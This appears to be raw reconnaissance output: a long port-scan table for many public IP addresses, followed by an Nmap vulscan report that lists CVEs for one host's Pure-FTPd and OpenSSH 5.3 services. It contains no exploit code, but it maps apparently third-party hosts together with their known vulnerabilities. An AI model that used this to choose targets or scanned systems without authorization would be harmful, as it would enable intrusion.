10012200.73.54.34 123 tcp ntp filtered
10013200.73.54.34 123 udp ntp unknown
10014200.73.54.34 137 tcp netbios-ns filtered
10015200.73.54.34 137 udp netbios-ns unknown
10016200.73.54.34 138 tcp netbios-dgm filtered
10017200.73.54.34 138 udp netbios-dgm unknown
10018200.73.54.34 139 tcp netbios-ssn filtered
10019200.73.54.34 139 udp netbios-ssn unknown
10020200.73.54.34 161 tcp snmp filtered
10021200.73.54.34 161 udp snmp unknown
10022200.73.54.34 162 tcp snmptrap filtered
10023200.73.54.34 162 udp snmptrap unknown
10024200.73.54.34 389 tcp ldap filtered
10025200.73.54.34 389 udp ldap unknown
10026200.73.54.34 520 tcp efs filtered
10027200.73.54.34 520 udp route unknown
10028200.73.54.34 2049 tcp nfs filtered
10029200.73.54.34 2049 udp nfs unknown
10030200.91.40.252 53 tcp domain filtered
10031200.91.40.252 53 udp domain unknown
10032200.91.40.252 67 tcp dhcps filtered
10033200.91.40.252 67 udp dhcps unknown
10034200.91.40.252 68 tcp dhcpc filtered
10035200.91.40.252 68 udp dhcpc unknown
10036200.91.40.252 69 tcp tftp filtered
10037200.91.40.252 69 udp tftp unknown
10038200.91.40.252 88 tcp kerberos-sec filtered
10039200.91.40.252 88 udp kerberos-sec unknown
10040200.91.40.252 123 tcp ntp filtered
10041200.91.40.252 123 udp ntp unknown
10042200.91.40.252 137 tcp netbios-ns filtered
10043200.91.40.252 137 udp netbios-ns unknown
10044200.91.40.252 138 tcp netbios-dgm filtered
10045200.91.40.252 138 udp netbios-dgm unknown
10046200.91.40.252 139 tcp netbios-ssn filtered
10047200.91.40.252 139 udp netbios-ssn unknown
10048200.91.40.252 161 tcp snmp filtered
10049200.91.40.252 161 udp snmp unknown
10050200.91.40.252 162 tcp snmptrap filtered
10051200.91.40.252 162 udp snmptrap unknown
10052200.91.40.252 389 tcp ldap filtered
10053200.91.40.252 389 udp ldap unknown
10054200.91.40.252 520 tcp efs filtered
10055200.91.40.252 520 udp route unknown
10056200.91.40.252 2049 tcp nfs filtered
10057200.91.40.252 2049 udp nfs unknown
10058200.91.41.5 53 tcp domain filtered
10059200.91.41.5 53 udp domain unknown
10060200.91.41.5 67 tcp dhcps filtered
10061200.91.41.5 67 udp dhcps unknown
10062200.91.41.5 68 tcp dhcpc filtered
10063200.91.41.5 68 udp dhcpc unknown
10064200.91.41.5 69 tcp tftp filtered
10065200.91.41.5 69 udp tftp unknown
10066200.91.41.5 88 tcp kerberos-sec filtered
10067200.91.41.5 88 udp kerberos-sec unknown
10068200.91.41.5 123 tcp ntp filtered
10069200.91.41.5 123 udp ntp unknown
10070200.91.41.5 137 tcp netbios-ns filtered
10071200.91.41.5 137 udp netbios-ns unknown
10072200.91.41.5 138 tcp netbios-dgm filtered
10073200.91.41.5 138 udp netbios-dgm unknown
10074200.91.41.5 139 tcp netbios-ssn filtered
10075200.91.41.5 139 udp netbios-ssn unknown
10076200.91.41.5 161 tcp snmp filtered
10077200.91.41.5 161 udp snmp unknown
10078200.91.41.5 162 tcp snmptrap filtered
10079200.91.41.5 162 udp snmptrap unknown
10080200.91.41.5 389 tcp ldap filtered
10081200.91.41.5 389 udp ldap unknown
10082200.91.41.5 520 tcp efs filtered
10083200.91.41.5 520 udp route unknown
10084200.91.41.5 2049 tcp nfs filtered
10085200.91.41.5 2049 udp nfs unknown
10086200.126.100.83 53 tcp domain filtered
10087200.126.100.83 53 udp domain unknown
10088200.126.100.83 67 tcp dhcps filtered
10089200.126.100.83 67 udp dhcps unknown
10090200.126.100.83 68 tcp dhcpc filtered
10091200.126.100.83 68 udp dhcpc unknown
10092200.126.100.83 69 tcp tftp filtered
10093200.126.100.83 69 udp tftp unknown
10094200.126.100.83 88 tcp kerberos-sec filtered
10095200.126.100.83 88 udp kerberos-sec unknown
10096200.126.100.83 123 tcp ntp filtered
10097200.126.100.83 123 udp ntp unknown
10098200.126.100.83 137 tcp netbios-ns filtered
10099200.126.100.83 137 udp netbios-ns unknown
10100200.126.100.83 138 tcp netbios-dgm filtered
10101200.126.100.83 138 udp netbios-dgm unknown
10102200.126.100.83 139 tcp netbios-ssn filtered
10103200.126.100.83 139 udp netbios-ssn unknown
10104200.126.100.83 161 tcp snmp filtered
10105200.126.100.83 161 udp snmp unknown
10106200.126.100.83 162 tcp snmptrap filtered
10107200.126.100.83 162 udp snmptrap unknown
10108200.126.100.83 389 tcp ldap filtered
10109200.126.100.83 389 udp ldap unknown
10110200.126.100.83 520 tcp efs filtered
10111200.126.100.83 520 udp route unknown
10112200.126.100.83 2049 tcp nfs filtered
10113200.126.100.83 2049 udp nfs unknown
10114201.159.170.136 53 tcp domain filtered
10115201.159.170.136 53 udp domain unknown
10116201.159.170.136 67 tcp dhcps filtered
10117201.159.170.136 67 udp dhcps unknown
10118201.159.170.136 68 tcp dhcpc filtered
10119201.159.170.136 68 udp dhcpc unknown
10120201.159.170.136 69 tcp tftp filtered
10121201.159.170.136 69 udp tftp unknown
10122201.159.170.136 88 tcp kerberos-sec filtered
10123201.159.170.136 88 udp kerberos-sec unknown
10124201.159.170.136 123 tcp ntp filtered
10125201.159.170.136 123 udp ntp unknown
10126201.159.170.136 137 tcp netbios-ns filtered
10127201.159.170.136 137 udp netbios-ns unknown
10128201.159.170.136 138 tcp netbios-dgm filtered
10129201.159.170.136 138 udp netbios-dgm unknown
10130201.159.170.136 139 tcp netbios-ssn filtered
10131201.159.170.136 139 udp netbios-ssn unknown
10132201.159.170.136 161 tcp snmp filtered
10133201.159.170.136 161 udp snmp unknown
10134201.159.170.136 162 tcp snmptrap filtered
10135201.159.170.136 162 udp snmptrap unknown
10136201.159.170.136 389 tcp ldap filtered
10137201.159.170.136 389 udp ldap unknown
10138201.159.170.136 520 tcp efs filtered
10139201.159.170.136 520 udp route unknown
10140201.159.170.136 2049 tcp nfs filtered
10141201.159.170.136 2049 udp nfs unknown
10142204.93.193.141 21 tcp ftp open Your connection to this server has been blocked.\x0d\x0a\x0d\x0aYou are most likely being blocked due to use of incorrect user/pass combination. Please, check all of your computers/devices to make sure that they are using the correct login credentials, including your email clients. You may also get blocked due to too many POP3/IMAP logins in 1 minute interval, please adjust your email client settings.\x0d\x0a
10143204.93.193.141 53 tcp domain filtered
10144204.93.193.141 53 udp domain unknown
10145204.93.193.141 67 tcp dhcps filtered
10146204.93.193.141 67 udp dhcps unknown
10147204.93.193.141 68 tcp dhcpc filtered
10148204.93.193.141 68 udp dhcpc unknown
10149204.93.193.141 69 tcp tftp filtered
10150204.93.193.141 69 udp tftp unknown
10151204.93.193.141 88 tcp kerberos-sec filtered
10152204.93.193.141 88 udp kerberos-sec unknown
10153204.93.193.141 123 tcp ntp filtered
10154204.93.193.141 123 udp ntp unknown
10155204.93.193.141 137 tcp netbios-ns filtered
10156204.93.193.141 137 udp netbios-ns unknown
10157204.93.193.141 138 tcp netbios-dgm filtered
10158204.93.193.141 138 udp netbios-dgm unknown
10159204.93.193.141 139 tcp netbios-ssn filtered
10160204.93.193.141 139 udp netbios-ssn unknown
10161204.93.193.141 161 tcp snmp filtered
10162204.93.193.141 161 udp snmp unknown
10163204.93.193.141 162 tcp snmptrap filtered
10164204.93.193.141 162 udp snmptrap unknown
10165204.93.193.141 389 tcp ldap filtered
10166204.93.193.141 389 udp ldap unknown
10167204.93.193.141 520 tcp efs filtered
10168204.93.193.141 520 udp route unknown
10169204.93.193.141 2049 tcp nfs filtered
10170204.93.193.141 2049 udp nfs unknown
10171206.48.140.40 53 tcp domain filtered
10172206.48.140.40 53 udp domain unknown
10173206.48.140.40 67 tcp dhcps filtered
10174206.48.140.40 67 udp dhcps unknown
10175206.48.140.40 68 tcp dhcpc filtered
10176206.48.140.40 68 udp dhcpc unknown
10177206.48.140.40 69 tcp tftp filtered
10178206.48.140.40 69 udp tftp unknown
10179206.48.140.40 88 tcp kerberos-sec filtered
10180206.48.140.40 88 udp kerberos-sec unknown
10181206.48.140.40 123 tcp ntp filtered
10182206.48.140.40 123 udp ntp unknown
10183206.48.140.40 137 tcp netbios-ns filtered
10184206.48.140.40 137 udp netbios-ns unknown
10185206.48.140.40 138 tcp netbios-dgm filtered
10186206.48.140.40 138 udp netbios-dgm unknown
10187206.48.140.40 139 tcp netbios-ssn filtered
10188206.48.140.40 139 udp netbios-ssn unknown
10189206.48.140.40 161 tcp snmp filtered
10190206.48.140.40 161 udp snmp unknown
10191206.48.140.40 162 tcp snmptrap filtered
10192206.48.140.40 162 udp snmptrap unknown
10193206.48.140.40 389 tcp ldap filtered
10194206.48.140.40 389 udp ldap unknown
10195206.48.140.40 520 tcp efs filtered
10196206.48.140.40 520 udp route unknown
10197206.48.140.40 2049 tcp nfs filtered
10198206.48.140.40 2049 udp nfs unknown
10199207.246.147.189 53 tcp domain filtered
10200207.246.147.189 53 udp domain unknown
10201207.246.147.189 67 tcp dhcps filtered
10202207.246.147.189 67 udp dhcps unknown
10203207.246.147.189 68 tcp dhcpc filtered
10204207.246.147.189 68 udp dhcpc unknown
10205207.246.147.189 69 tcp tftp filtered
10206207.246.147.189 69 udp tftp unknown
10207207.246.147.189 80 tcp http open nginx
10208207.246.147.189 88 tcp kerberos-sec filtered
10209207.246.147.189 88 udp kerberos-sec unknown
10210207.246.147.189 123 tcp ntp filtered
10211207.246.147.189 123 udp ntp unknown
10212207.246.147.189 137 tcp netbios-ns filtered
10213207.246.147.189 137 udp netbios-ns unknown
10214207.246.147.189 138 tcp netbios-dgm filtered
10215207.246.147.189 138 udp netbios-dgm unknown
10216207.246.147.189 139 tcp netbios-ssn filtered
10217207.246.147.189 139 udp netbios-ssn unknown
10218207.246.147.189 161 tcp snmp filtered
10219207.246.147.189 161 udp snmp unknown
10220207.246.147.189 162 tcp snmptrap filtered
10221207.246.147.189 162 udp snmptrap unknown
10222207.246.147.189 389 tcp ldap filtered
10223207.246.147.189 389 udp ldap unknown
10224207.246.147.189 443 tcp ssl/http open nginx
10225207.246.147.189 520 tcp efs filtered
10226207.246.147.189 520 udp route unknown
10227207.246.147.189 2049 tcp nfs filtered
10228207.246.147.189 2049 udp nfs unknown
10229207.246.147.190 53 tcp domain filtered
10230207.246.147.190 53 udp domain unknown
10231207.246.147.190 67 tcp dhcps filtered
10232207.246.147.190 67 udp dhcps unknown
10233207.246.147.190 68 tcp dhcpc filtered
10234207.246.147.190 68 udp dhcpc unknown
10235207.246.147.190 69 tcp tftp filtered
10236207.246.147.190 69 udp tftp unknown
10237207.246.147.190 80 tcp http open nginx
10238207.246.147.190 88 tcp kerberos-sec filtered
10239207.246.147.190 88 udp kerberos-sec unknown
10240207.246.147.190 123 tcp ntp filtered
10241207.246.147.190 123 udp ntp unknown
10242207.246.147.190 137 tcp netbios-ns filtered
10243207.246.147.190 137 udp netbios-ns unknown
10244207.246.147.190 138 tcp netbios-dgm filtered
10245207.246.147.190 138 udp netbios-dgm filtered
10246207.246.147.190 139 tcp netbios-ssn filtered
10247207.246.147.190 139 udp netbios-ssn unknown
10248207.246.147.190 161 tcp snmp filtered
10249207.246.147.190 161 udp snmp unknown
10250207.246.147.190 162 tcp snmptrap filtered
10251207.246.147.190 162 udp snmptrap unknown
10252207.246.147.190 389 tcp ldap filtered
10253207.246.147.190 389 udp ldap unknown
10254207.246.147.190 443 tcp ssl/http open nginx
10255207.246.147.190 520 tcp efs filtered
10256207.246.147.190 520 udp route unknown
10257207.246.147.190 2049 tcp nfs filtered
10258207.246.147.190 2049 udp nfs unknown
10259207.246.147.247 53 tcp domain filtered
10260207.246.147.247 53 udp domain filtered
10261207.246.147.247 67 tcp dhcps filtered
10262207.246.147.247 67 udp dhcps unknown
10263207.246.147.247 68 tcp dhcpc filtered
10264207.246.147.247 68 udp dhcpc unknown
10265207.246.147.247 69 tcp tftp filtered
10266207.246.147.247 69 udp tftp unknown
10267207.246.147.247 80 tcp http open nginx
10268207.246.147.247 88 tcp kerberos-sec filtered
10269207.246.147.247 88 udp kerberos-sec unknown
10270207.246.147.247 123 tcp ntp filtered
10271207.246.147.247 123 udp ntp unknown
10272207.246.147.247 137 tcp netbios-ns filtered
10273207.246.147.247 137 udp netbios-ns filtered
10274207.246.147.247 138 tcp netbios-dgm filtered
10275207.246.147.247 138 udp netbios-dgm unknown
10276207.246.147.247 139 tcp netbios-ssn filtered
10277207.246.147.247 139 udp netbios-ssn unknown
10278207.246.147.247 161 tcp snmp filtered
10279207.246.147.247 161 udp snmp unknown
10280207.246.147.247 162 tcp snmptrap filtered
10281207.246.147.247 162 udp snmptrap unknown
10282207.246.147.247 389 tcp ldap filtered
10283207.246.147.247 389 udp ldap unknown
10284207.246.147.247 443 tcp ssl/http open nginx
10285207.246.147.247 520 tcp efs filtered
10286207.246.147.247 520 udp route unknown
10287207.246.147.247 2049 tcp nfs filtered
10288207.246.147.247 2049 udp nfs unknown
10289207.246.147.248 53 tcp domain filtered
10290207.246.147.248 53 udp domain unknown
10291207.246.147.248 67 tcp dhcps filtered
10292207.246.147.248 67 udp dhcps unknown
10293207.246.147.248 68 tcp dhcpc filtered
10294207.246.147.248 68 udp dhcpc unknown
10295207.246.147.248 69 tcp tftp filtered
10296207.246.147.248 69 udp tftp unknown
10297207.246.147.248 80 tcp http open nginx
10298207.246.147.248 88 tcp kerberos-sec filtered
10299207.246.147.248 88 udp kerberos-sec unknown
10300207.246.147.248 123 tcp ntp filtered
10301207.246.147.248 123 udp ntp unknown
10302207.246.147.248 137 tcp netbios-ns filtered
10303207.246.147.248 137 udp netbios-ns unknown
10304207.246.147.248 138 tcp netbios-dgm filtered
10305207.246.147.248 138 udp netbios-dgm unknown
10306207.246.147.248 139 tcp netbios-ssn filtered
10307207.246.147.248 139 udp netbios-ssn unknown
10308207.246.147.248 161 tcp snmp filtered
10309207.246.147.248 161 udp snmp unknown
10310207.246.147.248 162 tcp snmptrap filtered
10311207.246.147.248 162 udp snmptrap unknown
10312207.246.147.248 389 tcp ldap filtered
10313207.246.147.248 389 udp ldap unknown
10314207.246.147.248 443 tcp ssl/http open nginx
10315207.246.147.248 520 tcp efs filtered
10316207.246.147.248 520 udp route unknown
10317207.246.147.248 2049 tcp nfs filtered
10318207.246.147.248 2049 udp nfs unknown
10319211.13.196.135 25 tcp smtp closed
10320211.13.196.135 53 tcp domain filtered
10321211.13.196.135 53 udp domain unknown
10322211.13.196.135 67 tcp dhcps filtered
10323211.13.196.135 67 udp dhcps unknown
10324211.13.196.135 68 tcp dhcpc filtered
10325211.13.196.135 68 udp dhcpc unknown
10326211.13.196.135 69 tcp tftp filtered
10327211.13.196.135 69 udp tftp unknown
10328211.13.196.135 80 tcp http open Apache httpd
10329211.13.196.135 88 tcp kerberos-sec filtered
10330211.13.196.135 88 udp kerberos-sec unknown
10331211.13.196.135 113 tcp ident closed
10332211.13.196.135 123 tcp ntp filtered
10333211.13.196.135 123 udp ntp unknown
10334211.13.196.135 137 tcp netbios-ns filtered
10335211.13.196.135 137 udp netbios-ns filtered
10336211.13.196.135 138 tcp netbios-dgm filtered
10337211.13.196.135 138 udp netbios-dgm filtered
10338211.13.196.135 139 tcp netbios-ssn closed
10339211.13.196.135 139 udp netbios-ssn unknown
10340211.13.196.135 161 tcp snmp filtered
10341211.13.196.135 161 udp snmp unknown
10342211.13.196.135 162 tcp snmptrap filtered
10343211.13.196.135 162 udp snmptrap unknown
10344211.13.196.135 389 tcp ldap filtered
10345211.13.196.135 389 udp ldap unknown
10346211.13.196.135 443 tcp ssl/http open Apache httpd
10347211.13.196.135 445 tcp microsoft-ds closed
10348211.13.196.135 520 tcp efs filtered
10349211.13.196.135 520 udp route unknown
10350211.13.196.135 2049 tcp nfs filtered
10351211.13.196.135 2049 udp nfs unknown
10352212.174.0.150 53 tcp domain filtered
10353212.174.0.150 53 udp domain unknown
10354212.174.0.150 67 tcp dhcps filtered
10355212.174.0.150 67 udp dhcps unknown
10356212.174.0.150 68 tcp dhcpc filtered
10357212.174.0.150 68 udp dhcpc unknown
10358212.174.0.150 69 tcp tftp filtered
10359212.174.0.150 69 udp tftp unknown
10360212.174.0.150 80 tcp http open Microsoft IIS httpd 8.5
10361212.174.0.150 88 tcp kerberos-sec filtered
10362212.174.0.150 88 udp kerberos-sec unknown
10363212.174.0.150 123 tcp ntp filtered
10364212.174.0.150 123 udp ntp unknown
10365212.174.0.150 137 tcp netbios-ns filtered
10366212.174.0.150 137 udp netbios-ns unknown
10367212.174.0.150 138 tcp netbios-dgm filtered
10368212.174.0.150 138 udp netbios-dgm unknown
10369212.174.0.150 139 tcp netbios-ssn filtered
10370212.174.0.150 139 udp netbios-ssn unknown
10371212.174.0.150 161 tcp snmp filtered
10372212.174.0.150 161 udp snmp unknown
10373212.174.0.150 162 tcp snmptrap filtered
10374212.174.0.150 162 udp snmptrap unknown
10375212.174.0.150 389 tcp ldap filtered
10376212.174.0.150 389 udp ldap unknown
10377212.174.0.150 520 tcp efs filtered
10378212.174.0.150 520 udp route unknown
10379212.174.0.150 2049 tcp nfs filtered
10380212.174.0.150 2049 udp nfs unknown
10381216.172.184.117 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 5 of 150 allowed.\x0d\x0a220-Local time is now 01:41. Server port: 21.\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
10382216.172.184.117 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
10383216.172.184.117 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
10384216.172.184.117 67 tcp dhcps closed
10385216.172.184.117 67 udp dhcps closed
10386216.172.184.117 68 tcp dhcpc closed
10387216.172.184.117 68 udp dhcpc unknown
10388216.172.184.117 69 tcp tftp closed
10389216.172.184.117 69 udp tftp unknown
10390216.172.184.117 88 tcp kerberos-sec closed
10391216.172.184.117 88 udp kerberos-sec unknown
10392216.172.184.117 123 tcp ntp closed
10393216.172.184.117 123 udp ntp unknown
10394216.172.184.117 137 tcp netbios-ns closed
10395216.172.184.117 137 udp netbios-ns unknown
10396216.172.184.117 138 tcp netbios-dgm closed
10397216.172.184.117 138 udp netbios-dgm closed
10398216.172.184.117 139 tcp netbios-ssn closed
10399216.172.184.117 139 udp netbios-ssn closed
10400216.172.184.117 161 tcp snmp closed
10401216.172.184.117 161 udp snmp unknown
10402216.172.184.117 162 tcp snmptrap closed
10403216.172.184.117 162 udp snmptrap closed
10404216.172.184.117 389 tcp ldap closed
10405216.172.184.117 389 udp ldap closed
10406216.172.184.117 520 tcp efs closed
10407216.172.184.117 520 udp route closed
10408216.172.184.117 2049 tcp nfs closed
10409216.172.184.117 2049 udp nfs unknown
10410218.45.5.97 25 tcp smtp closed
10411218.45.5.97 53 tcp domain filtered
10412218.45.5.97 53 udp domain unknown
10413218.45.5.97 67 tcp dhcps filtered
10414218.45.5.97 67 udp dhcps unknown
10415218.45.5.97 68 tcp dhcpc filtered
10416218.45.5.97 68 udp dhcpc unknown
10417218.45.5.97 69 tcp tftp filtered
10418218.45.5.97 69 udp tftp unknown
10419218.45.5.97 80 tcp http open Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.15
10420218.45.5.97 88 tcp kerberos-sec filtered
10421218.45.5.97 88 udp kerberos-sec unknown
10422218.45.5.97 113 tcp ident closed
10423218.45.5.97 123 tcp ntp filtered
10424218.45.5.97 123 udp ntp unknown
10425218.45.5.97 137 tcp netbios-ns filtered
10426218.45.5.97 137 udp netbios-ns filtered
10427218.45.5.97 138 tcp netbios-dgm filtered
10428218.45.5.97 138 udp netbios-dgm filtered
10429218.45.5.97 139 tcp netbios-ssn closed
10430218.45.5.97 139 udp netbios-ssn unknown
10431218.45.5.97 161 tcp snmp filtered
10432218.45.5.97 161 udp snmp unknown
10433218.45.5.97 162 tcp snmptrap filtered
10434218.45.5.97 162 udp snmptrap unknown
10435218.45.5.97 389 tcp ldap filtered
10436218.45.5.97 389 udp ldap unknown
10437218.45.5.97 443 tcp ssl/http open Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.15
10438218.45.5.97 445 tcp microsoft-ds closed
10439218.45.5.97 520 tcp efs filtered
10440218.45.5.97 520 udp route unknown
10441218.45.5.97 2049 tcp nfs filtered
10442218.45.5.97 2049 udp nfs unknown
10443#################################################################################################################################
10444Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:39 EDT
10445Nmap scan report for 199.38.245.243
10446Host is up (0.26s latency).
10447Not shown: 986 closed ports
10448PORT STATE SERVICE VERSION
1044921/tcp open ftp Pure-FTPd
10450| vulscan: VulDB - https://vuldb.com:
10451| [102925] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface pureftpd.passwd HTTP Request privilege escalation
10452| [57510] Pureftpd Pure-FTPd up to 0.x Memory Consumption denial of service
10453| [57504] Pureftpd Pure-FTPd up to 0.x ftp_parser.c Cleartext unknown vulnerability
10454|
10455| MITRE CVE - https://cve.mitre.org:
10456| [CVE-2004-0656] The accept_client function in PureFTPd 1.0.18 and earlier allows remote attackers to cause a denial of service by exceeding the maximum number of connections.
10457|
10458| SecurityFocus - https://www.securityfocus.com/bid/:
10459| [10664] PureFTPd Accept_Client Remote Denial of Service Vulnerability
10460|
10461| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10462| No findings
10463|
10464| Exploit-DB - https://www.exploit-db.com:
10465| No findings
10466|
10467| OpenVAS (Nessus) - http://www.openvas.org:
10468| No findings
10469|
10470| SecurityTracker - https://www.securitytracker.com:
10471| [1010701] PureFTPd Logic Bug in accept_client() Lets Remote Users Crash the FTP Daemon
10472| [1008135] (Claim is Retracted) PureFTPd Buffer Overflow in displayrate() Lets Remote Users Crash the Service
10473| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
10474| [1001126] PureFTPd May Allow Remote Users to Deny Service on the Server
10475|
10476| OSVDB - http://www.osvdb.org:
10477| No findings
10478|_
1047922/tcp open ssh OpenSSH 5.3 (protocol 2.0)
10480| vulscan: VulDB - https://vuldb.com:
10481| [80267] OpenSSH up to 5.x/6.x/7.1p1 Forward Option roaming_common.c roaming_read/roaming_write memory corruption
10482| [80266] OpenSSH up to 5.x/6.x/7.1p1 roaming_common.c resend_bytes information disclosure
10483| [4584] OpenSSH up to 5.7 auth-options.c information disclosure
10484| [4282] OpenSSH 5.6/5.7 Legacy Certificate memory corruption
10485|
10486| MITRE CVE - https://cve.mitre.org:
10487| [CVE-2006-0883] OpenSSH on FreeBSD 5.3 and 5.4, when used with OpenPAM, does not properly handle when a forked child process terminates during PAM authentication, which allows remote attackers to cause a denial of service (client connection refusal) by connecting multiple times to the SSH server, waiting for the password prompt, then disconnecting.
10488| [CVE-2012-0814] The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially sensitive information by reading these messages, as demonstrated by the shared user account required by Gitolite. NOTE: this can cross privilege boundaries because a user account may intentionally have no shell or filesystem access, and therefore may have no supported way to read an authorized_keys file in its own home directory.
10489| [CVE-2011-5000] The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field. NOTE: there may be limited scenarios in which this issue is relevant.
10490| [CVE-2011-0539] The key_certify function in usr.bin/ssh/key.c in OpenSSH 5.6 and 5.7, when generating legacy certificates using the -t command-line option in ssh-keygen, does not initialize the nonce field, which might allow remote attackers to obtain sensitive stack memory contents or make it easier to conduct hash collision attacks.
10491| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
10492| [CVE-2010-4478] OpenSSH 5.6 and earlier, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol, a related issue to CVE-2010-4252.
10493| [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
10494| [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
10495| [CVE-2008-3259] OpenSSH before 5.1 sets the SO_REUSEADDR socket option when the X11UseLocalhost configuration setting is disabled, which allows local users on some platforms to hijack the X11 forwarding port via a bind to a single IP address, as demonstrated on the HP-UX platform.
10496|
10497| SecurityFocus - https://www.securityfocus.com/bid/:
10498| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
10499| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
10500| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
10501| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
10502| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
10503| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
10504| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
10505| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
10506| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
10507| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
10508| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
10509| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
10510| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
10511| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
10512| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
10513| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
10514| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
10515| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
10516| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
10517| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
10518| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
10519| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
10520| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
10521| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
10522| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
10523| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
10524| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
10525| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
10526| [75990] OpenSSH Login Handling Security Bypass Weakness
10527| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
10528| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
10529| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
10530| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
10531| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
10532| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
10533| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
10534| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
10535| [61286] OpenSSH Remote Denial of Service Vulnerability
10536| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
10537| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
10538| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
10539| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
10540| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
10541| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
10542| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
10543| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
10544| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
10545| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
10546| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
10547| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
10548| [30794] Red Hat OpenSSH Backdoor Vulnerability
10549| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
10550| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
10551| [28531] OpenSSH ForceCommand Command Execution Weakness
10552| [28444] OpenSSH X Connections Session Hijacking Vulnerability
10553| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
10554| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
10555| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
10556| [20956] OpenSSH Privilege Separation Key Signature Weakness
